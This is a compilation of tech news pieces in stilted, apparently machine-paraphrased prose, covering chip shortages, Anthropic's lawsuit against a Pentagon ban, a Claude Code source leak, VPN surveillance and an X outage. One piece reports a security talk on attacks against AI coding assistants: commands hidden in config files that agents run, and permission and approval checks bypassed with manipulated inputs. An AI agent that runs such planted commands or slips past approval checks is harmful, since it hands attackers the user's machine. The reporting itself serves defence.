Now coming into view, top chip producers like Intel and AMD face difficulty keeping up with processor needs. Because of tighter supplies, computer and server builders get fewer chips than ordered - slowing assembly processes down. This gap pushes shipment timelines further out while lifting prices by roughly one-tenth to slightly more than an eighth. With supply trailing behind, companies brace for longer waits and steeper costs. Heavy demand has pushed key tech suppliers like Dell and HP to report deeper shortages lately. Server parts now take months rather than weeks to arrive - delays once rare are becoming routine. 

Into early 2026, experts expect disruptions to grow worse, stretching stress across business systems and home buyers alike. With CPU availability shrinking, pressure grows on a memory market already strained. Because of rising AI-driven datacenter projects, need for DRAM and NAND has jumped sharply - shifting production lines from devices like smartphones and laptops. This shift means newer tech such as DDR5 costs more than before, making upgrades less appealing. People now hold onto older machines longer, especially those running DDR4, simply because replacing them feels too costly. 

Nowhere is the strain more visible than in everyday device markets. Higher expenses for parts translate directly into steeper price tags on laptops, along with slower release cycles. Take Valve - their Linux-powered compact desktop hit pause, held back by material shortages. On another front, Micron stepped away from selling memory modules to regular users, focusing instead on large-scale computing and artificial intelligence needs. Shifts like these reveal where attention now lies within the sector. 

Facing growing challenges, legacy chip producers watch as new players step in. Not far behind, Arm launches its debut self-designed CPU, built specifically for artificial intelligence tasks. Demand was lacking - now it's shifting. Big names like Meta, Cloudflare, OpenAI, and Lenovo are paying attention, drawn by fresh potential. Change arrives quietly, then spreads. 

Facing ongoing shortages, market projections point to extended disruptions through the 2030s - altering how prices evolve while shifting the rhythm of technological advances in chips and computing systems.

Judge Blocks Pentagon's Retaliatory AI Ban on Anthropic

 

A federal judge has temporarily halted the Pentagon's effort to designate AI company Anthropic as a supply chain risk, ruling that the move appeared driven by retaliation rather than legitimate security concerns. In a 48-page order, U.S. District Judge Rita Lin, appointed by former President Joe Biden, granted Anthropic a preliminary injunction against 17 federal agencies, including the Pentagon, preventing them from enforcing the ban until the lawsuit concludes. This keeps Anthropic's Claude AI accessible to government users amid escalating tensions over military contracts. 

The conflict erupted during negotiations to expand a $200 million Pentagon contract with Anthropic. Anthropic refused proposed language permitting "all lawful use" of its AI, citing risks like mass surveillance or autonomous weapons—a stance CEO Dario Amodei publicly emphasized. In response, President Donald Trump posted on Truth Social on February 27 directing agencies to "IMMEDIATELY CEASE all use of Anthropic’s technology," while Defense Secretary Pete Hegseth announced on X that no military partners could engage with the firm. 

On March 4, the administration formalized the designation under two statutes: 41 USC 4713 for federal-wide restrictions and 10 USC 3252 for Defense Department-specific actions. Anthropic swiftly filed lawsuits in California's Northern District and the DC Circuit, arguing the labels were pretextual punishment for its ethical safeguards. Judge Lin agreed, noting the government's shift from contract disputes to broad bans suggested improper motives. 

Pentagon Chief Technology Officer Emil Michael countered on X that Lin's order contained "dozens of factual errors" and insisted the 41 USC 4713 designation remains in effect, as it falls outside her jurisdiction . Anthropic welcomed the swift ruling, reaffirming its commitment to safe AI while awaiting DC Circuit decisions. Legal experts are split: some see the injunction as limited, potentially leaving parts of the ban intact. 

This case underscores deepening rifts between AI firms and the government over technology controls in national security.It raises questions about executive power to penalize contractors, the role of public statements in legal proceedings, and AI deployment ethics amid rapid advancements. As appeals loom in the 9th Circuit, the dispute could drag on for years, impacting federal AI adoption and Anthropic's partnerships.

Anthropic Claude Code Leak Sparks Frenzy Among Chinese Developers

 

A fresh wave of interest emerged worldwide after Anthropic’s code surfaced online, drawing sharp focus from tech builders across China. This exposure came through a misstep - shipping a tool meant for coding tasks with hidden layers exposed, revealing structural choices usually kept private. Details once locked inside now show how decisions shape performance behind the scenes.  

Even after fixing the breach fast, consequences moved faster. Around the globe, coders started studying the files, yet reaction surged most sharply in China - official reach of Anthropic's systems missing there entirely. Using encrypted tunnels online, builders hurried copies of the shared source down onto machines, racing ahead of any shutdown moves. Though patched swiftly, effects rippled outward without pause. 

Suddenly, chatter about the event exploded across China’s social networks, as engineers began unpacking Claude Code’s architecture in granular posts. Though unofficial, the exposed material revealed inner workings like memory management, coordination modules, and task-driven processes - elements shaping how automated programming tools operate outside lab settings. 

Though the leak left model weights untouched - those being the core asset in closed AI frameworks - specialists emphasize the worth found in what emerged. Revealing how raw language models evolve into working tools, it uncovers choices usually hidden behind corporate walls. What spilled out shows pathways others might follow, giving insight once guarded closely. Engineering trade-offs now sit in plain sight, altering who gets to learn them.  
Some experts believe access to these details might speed up progress at competing artificial intelligence firms. 
According to one engineer in Beijing, the exposed documents were like gold - offering real insight into how advanced tools are built. Teams operating under tight constraints suddenly found themselves seeing high-level system designs they normally would never encounter. When Anthropic reacted, the exposed package was quickly pulled down, with removal notices sent to sites such as GitHub. 

Yet before those steps took effect, duplicates had spread widely, stored now in numerous code archives. Complete control became nearly impossible at that stage. Questions have emerged regarding how AI firms manage internal safeguards along with information flow. Emphasis grows on worldwide interest in sophisticated artificial intelligence systems - especially areas facing restricted availability because of political or legal barriers. 

The growing attention highlights how hard it is for businesses to protect private data, especially when working in fast-moving artificial intelligence fields where pressure never lets up.

US Lawmakers Question VPN Surveillance, Seek Transparency on Privacy Risks

 

Now under scrutiny: demands from American legislators for clearer rules on state tracking of online tools like virtual private networks. Backed by six congressional Democrats - including Ron Wyden - a letter reaches out to intelligence chief Tulsi Gabbard, pressing for answers about access to personal information stored abroad via these encrypted channels. Questions grow louder about how much unseen oversight occurs beyond borders. 

Although the letter stops short of claiming active surveillance, it highlights unease over how VPN usage could endanger personal privacy - particularly when evidence gathering occurs without warrants. Because these officials are cleared for secret briefings, their inquiries likely reflect hidden threats not yet made public. Traffic rerouted via distant servers masks a person's actual location online. 

From one country to another, these hubs handle masses of connections simultaneously. Streams merge - origin points blurred across regions. Officials point out: such pooling might draw surveillance interest unexpectedly. Shared infrastructure raises quiet questions about oversight behind the scenes. What worries many stems from how the National Security Agency uses its powers under Section 702 of the Foreign Intelligence Surveillance Act - allowing it to monitor people outside the U.S. without a warrant. 

Still, concerns persist because such monitoring often sweeps up messages tied to Americans, especially when vast amounts of data are pulled in at once. Officials pointed out current rules treating people as overseas when their whereabouts are uncertain or beyond American territory. Because virtual private networks mask where users actually are, citizens might fall under surveillance without standard safeguards applying. Though designed for privacy, such tools may place domestic activity into international categories by default. 

Although some agencies promote VPN usage for better digital safety, concerns emerge about mixed signals in public guidance. Officials warn individuals might overlook hidden monitoring dangers when connecting through foreign servers, despite earlier recommendations favoring such tools. Now comes the push from legislators, urging intelligence agencies to explain if VPN usage affects personal privacy - while offering ways people might shield their data more effectively. 

Open dialogue matters, they argue, because without it, U.S. citizens cannot weigh digital risks wisely. What follows depends on transparency shaping understanding. Today’s linked world amplifies the strain where state safety demands often clash with personal data rights. A broader unease surfaces when governments push surveillance while citizens demand space. 

As connections cross borders effortlessly, control over information becomes harder to define. National interests pull one way; private lives resist being pulled along. What feels necessary for defense may still erode trust slowly. In digital spaces without walls, balance remains fragile.

AI Coding Assistants Expose New Cyber Risks, Undermining Endpoint Security Defenses

 

Not everyone realizes how much artificial intelligence shapes online safety today - yet studies now indicate it might be eroding essential protection layers. At the RSAC 2026 gathering in San Francisco, insights came sharply into focus when Oded Vanunu spoke; he holds a top tech role at Check Point Software. 

His message? Tools using AI to help write code could actually open doors to fresh risks on user devices. Not everything about coding assistants runs smoothly, Vanunu pointed out during his talk. Tools like Claude Code, OpenAI Codex, and Google Gemini carry hidden flaws despite their popularity. Though they speed up work for programmers, deeper issues emerge beneath the surface. Security measures that have stood firm for years now face quiet circumvention. 

What looks like progress might also open backdoors by design. Despite gains in digital protection during recent years - tools like real-time threat tracking, isolated testing environments, and internet-hosted setups have made devices safer - an unforeseen setback is emerging. Artificial intelligence helpers used in software creation now demand broad entry into internal machines, setup records, along with connection points. Since coders routinely allow full control, unseen doors open. 

These openings can be used by hostile actors aiming to infiltrate. Progress, it turns out, sometimes carries hidden trade-offs. Now under pressure from AI agents wielding elevated access, Vanunu likened today’s endpoints to a once-solid fortress. These tools, automating actions while interfacing deeply with system settings, slip past conventional defenses unable to track such dynamic activity. 

A blind spot forms - silent, unnoticed - where malicious actors quietly move in. One key issue identified in the study involves the exploitation of config files like .json, .env, or .toml. While not seen as harmful by many, such file types typically escape scrutiny during security checks. Hidden within them, hostile code might reside - quietly waiting. Because systems frequently treat these documents as safe, automated processes, including AI-driven ones, could run embedded commands without raising alarms. 

This opens a path for intrusion that skips conventional virus-like components. Unexpected weaknesses emerged within AI coding systems, revealing gaps like flawed command handling. Some platforms allowed unauthorized operations by sidestepping permission checks. Running dangerous instructions became possible without clear user agreement in certain scenarios. Previously accepted tasks were altered silently, inserting harmful elements later. Remote activation of external code exposed further exposure points. 

Approval processes failed under manipulated inputs during testing. Even after fixing these flaws, one truth stands clear - security boundaries keep changing because of artificial intelligence. Tools meant to help coders do their jobs now open new doors for those aiming to break in. What once focused on systems has moved toward everyday software assistants. Fixing old problems does not stop newer risks from emerging through trusted workflows. 

Starting fresh each time matters when checking every AI tool currently running. One way forward involves separating code helpers into locked-down spaces where they can’t reach sensitive systems. Configuration files deserve just as much attention as programs that run directly. With more companies using artificial intelligence, old-style defenses might no longer fit the real dangers appearing now.

X Faces Global Outage Twice in Hours, Thousands of Users Report Access Issues

 

Hours apart, fresh disruptions hit X - once called Twitter - as glitches blocked entry for countless people across regions. Though brief, these lapses fuel unease over stability under Musk’s control, following a trail of prior breakdowns just lately. A pattern forms without needing bold claims: service falters too often now. 

Early afternoon saw service disruptions start across the U.S., per Downdetector figures, hitting a high point near 3:50 PM EST with about 25,000 affected individuals. Later that evening, roughly at 8:00 PM EST, another wave emerged - over 6,000 people then faced login difficulties. 

Problems surfaced across multiple areas, according to user feedback. Close to fifty percent struggled just to open the app on their phones. Some saw broken features within the feed or site navigation failing mid-use. Interruptions popped up globally - not confined by borders - hitting people in both UK cities and Indian towns alike. 

Fewer incidents appeared out of India at first, yet the next wave brought a clear rise - more than six hundred alerts came through by dawn. That same split trend showed up elsewhere, too: data from StatusGator backed the idea of two separate waves hitting at different times. 

Even though the problem spread widely, X stayed silent on what triggered it. Still, users asking about glitches got answers from Grok, its built-in chat assistant. A hiccup in systems stopped feeds from refreshing, according to the bot. Pages showed errors instead of content during the episode. Past patterns hint at fast fixes when similar faults occurred. Resolution could come without delay, the machine implied. 

Frustration spread through user communities when services went down unexpectedly. Online spaces filled quickly as people shared what they encountered during the downtime. Some saw pages fail to load halfway; others found nothing loaded at all. Reports pointed to repeated problems over recent weeks, not just isolated moments. 

A pattern emerged - not sudden failure, but lingering instability across visits. Still reeling from another outage, X faces mounting pressure as service disruptions chip away at reliability worldwide. A fresh breakdown underscores persistent weaknesses in its operational backbone. 

With each failure, trust erodes just a bit more among users who depend on steady access. Problems aren’t isolated - they ripple through regions where uptime matters most. Behind the scenes, fixes appear slow, inconsistent, or both. What looked like progress now seems fragile under repeated strain.